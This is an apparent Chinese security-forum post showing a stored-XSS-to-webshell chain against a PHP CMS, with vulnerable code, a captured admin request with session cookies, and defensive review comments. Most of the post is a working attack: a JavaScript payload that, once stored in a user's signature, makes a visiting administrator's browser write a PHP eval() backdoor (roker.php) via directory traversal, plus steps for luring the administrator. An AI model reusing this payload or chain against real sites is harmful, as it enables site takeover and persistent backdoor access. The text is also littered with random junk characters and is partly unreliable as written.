这个cms 以前 90有人发了个getshell，当时是后台验证文件的问题
官网已经修补了,所以重新下了源码
因为后台登入还需要认证码，所以注入就没看了。
存在 xss
漏洞文件 user/member/skin_edit.php
<!-- Output sink for the stored signature: $cscms_qianm is echoed into the textarea body
     as-is, with no htmlspecialchars(); this is where the XSS described in the post renders.
     Mitigation: escape at output (htmlspecialchars($cscms_qianm, ENT_QUOTES)) and apply
     length/character-set rules to CS_Qianm where user/do.php saves it. -->
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
$ k0 j' t6 z0 v" Q1 ]
1 ]0 j" p' f* c; o</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>4 p- Q& S3 ^ b
2 H* z1 Z# j: b$ O! |. x' M</textarea></td></tr>' G9 Z- f1 _: H
user/do.php
( }: N$ G8 U+ U7 e e; B \. M
0 S' a% w! \2 c8 s
// Profile ("zl") branch of user/do.php: rewrites the caller's own row in the user table
// from the submitted CS_* fields and always terminates through a Msg_Error() redirect.
// Review notes (defender's view):
//  - the guard below only checks four fields for emptiness; CS_Qianm (signature) and
//    CS_Sex are not validated at all, and no length or character-set rule is applied.
//  - the UPDATE statement is assembled by string concatenation, with CS_Sex spliced in
//    unquoted. Whether a global filter escapes these variables before this point is not
//    visible here, so treat the query as needing parameterisation rather than assuming it.
//  - CS_Qianm is stored verbatim and later echoed raw into skin_edit.php's textarea
//    (the XSS sink the post describes); the fix is htmlspecialchars() at output time.
/ V6 B: y7 i$ i) Jif($op=='zl'){ // profile
1 O% P$ Q0 `4 F if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
" S% { m# B% A/ Q" i' [ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));4 ]- t$ l& |2 _
! ^3 `/ W5 i: c# p
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',8 K& ~- G X/ k8 O# D/ L9 F
) j7 A0 d+ u" l6 V
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ c P z8 m; h3 d S
where CS_Name='".$cscms_name."'";
# k7 D: D6 L S% k
; O0 s. t; [- A0 @( l if($db->query($sql)){
& W. e, w; a2 S# d, } S9 ? ' i$ a$ J' \3 q5 L& r9 l1 _2 l9 v
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
/ Q0 R; _) v: { P
, D$ D' E1 Y& N2 _0 B2 l }else{
9 k6 _8 P6 E! }, c, v4 G5 d; O5 ]
' {% K) H3 T. J! P- }' | exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 \; S$ D/ L. j8 h
. k: V8 L( s% |% q
}4 `, p3 G9 ^( B4 N& _
2 Q; n; a6 ?0 `8 |6 i
没有过滤导致xss产生。
后台 看了下 很奇葩的是可以写任意格式文件。。
抓包。。
E/ G9 y' q9 Y; ^5 J' R: x+ ]5 H# r5 W# y: V, q" ~' v
5 n2 ?% }: X! H& N本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1$ T N2 O* S' g2 L
; h7 p# O) v1 [0 w7 O! zAccept: text/html, application/xhtml+xml, */*% D4 a( ]& \) e* j% D N. p
9 q( z9 `: F4 GReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
2 n) w: F, E9 Z; \- U2 x+ z# a9 l
& j4 f8 M! ~1 I' a$ t2 RAccept-Language: zh-CN
% I: l" T9 k) p A$ E0 ]' u
8 `0 J( M6 z# C6 Q* g! oUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
$ n) [* d/ y8 W
/ X2 L# r1 U* k. Z0 N2 }/ M: f7 hContent-Type: application/x-www-form-urlencoded. C! F9 E( ?1 |+ Q1 N+ m! j. f
j* l: ?& W9 v/ A7 j' {
Accept-Encoding: gzip, deflate2 f8 { c+ X0 t: o& { m
0 Y9 h& y" A1 g) D4 U, e# q ~2 n0 WHost: 127.0.0.16 N" B/ m, F7 z% d
9 r* R9 G+ p1 i+ @
Content-Length: 38
( P& U" _ s/ t @5 S- ]! t
8 d: ]! Q. n3 H6 O: @) q) }: LDNT: 1# S) o& T0 S6 `$ t# A1 P
* t0 U- f0 k7 c9 T" R; h5 v
Connection: Keep-Alive& x( ?+ o6 S, K9 e9 z
, X6 E3 U/ s h; R8 s% UCache-Control: no-cache
" J9 D$ K5 f) n3 @! ]- f9 N X# Y, G. J* T6 E9 _" V
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594, B) p+ q9 O6 U4 U {! s9 `
, o& i: @& j/ G- |/ k' k8 g6 D, L/ n# G
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
/ z ~. b) z, K, Y Q$ c, F
0 c7 V9 }3 ]+ }- J' g5 a2 A% O6 |3 m" y! S4 G. r
- {3 _- g& E/ K7 `8 N* o, i+ }
于是构造js如下。
: m) ]) R' E! Z! y: N本帖隐藏的内容<script> % l4 ~# u' @3 P5 ^
// Review notes (defender's view): both statements assign an undeclared identifier
// (implicit global, no `var`/`const`). The admin URL is derived from the hostname of the
// page the script runs in, so it follows whichever deployment rendered the unescaped
// signature. The `path=../../` query value is the directory-traversal half of the bug:
// the skins editor should canonicalise `path` and refuse anything outside its template root.
thisTHost = top.location.hostname;
3 n# }3 H8 W" G# c& g% m # l- W7 p( w* F- S8 z+ n
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";% D+ @ P* j" h
/**
 * Builds a hidden POST form carrying the fields `name` and `content` (the same pair seen
 * in the captured request above) and submits it to `url` from the viewer's browser.
 * @param {string} url  form action the request is posted to
 * @param {string} data value of the `name` field (file name on the server side)
 * @param {string} msg  value of the `content` field (file body)
 * Defensive notes: nothing in this form carries a secret, which is exactly why a
 * per-request CSRF token bound to the admin session (plus SameSite cookies) would stop it.
 * Server side, `name` should be limited to an extension allowlist — the post notes any
 * format is accepted — and `path` pinned to the template directory. A Referer/Origin that
 * is a user-content page rather than the admin panel is the signal to alert on.
 */
9 A) y j) d1 L3 Efunction PostSubmit(url, data, msg) {
# o+ s [: a: y2 i; S( ~4 z var postUrl = url;# P \. V9 l6 Z. }. Q1 p; @
6 t; V; C5 L$ E
var postData = data;
' C( E! M' z4 N' x var msgData = msg;
// Form and both inputs are created hidden and attached to the current document.
2 E8 |6 H" ]0 Z! [, k var ExportForm = document.createElement("FORM"); 6 Y+ b8 q- |, T; A
document.body.appendChild(ExportForm); 0 |3 l. ]" K( c5 F7 L) e/ I) I
ExportForm.method = "POST";
; E" `* ~1 @' m; Y var newElement = document.createElement("input"); & [# Q2 `, ~! W: Q- }8 Q8 q, N8 k
newElement.setAttribute("name", "name"); / p) Q7 |% [8 q. Z
newElement.setAttribute("type", "hidden"); 5 X6 P& y4 J3 \& U0 _
var newElement2 = document.createElement("input");
% t& {3 a* {- F. O newElement2.setAttribute("name", "content");
9 x# q2 a6 z8 L+ ?8 G newElement2.setAttribute("type", "hidden"); ! m* s3 n* b3 f
ExportForm.appendChild(newElement);
# R- b% [3 d, _, g2 X( G- L6 i5 B" ] ExportForm.appendChild(newElement2);
' ]; h0 e! y5 Z6 v5 h4 p7 R1 A8 {: U newElement.value = postData; 1 p0 K1 |) S. p7 c" M, @* S. i
newElement2.value = msgData; ) ^0 d1 y' T4 J7 p, B7 S( ~+ E6 x
ExportForm.action = postUrl; - g- L; y, K0 r& g9 C6 o0 m0 g
// Submission happens without any user interaction as soon as the page renders.
ExportForm.submit(); , E2 O9 c' [5 [, J2 K
};
5 m9 |3 l( c+ H; m1 h5 H# |
// Payload call: requests a file named roker.php, whose body is a PHP eval() backdoor, in the
// traversed directory. The two server-side checks that would stop it are an extension
// allowlist on `name` and a canonicalised, root-pinned `path`; on disk, any newly created
// .php file under skins/ is the artefact to alert on.
6 c4 c, R$ {3 L! LPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
( b+ |( N- C/ a9 P2 q K# T 3 l8 ?# o$ R4 }: p4 K w; p. Z
</script>
1 R, g7 O B2 n5 n, S
4 v+ P7 U9 J! ~
0 `1 p. Y. E( f5 a* @+ A1 \3 |+ p1 o4 o' u$ N9 p7 S) v* U
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
用你的账号给管理写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid自己改）
就会在 skins\index\html\ 目录下生成 roker.php 一句话。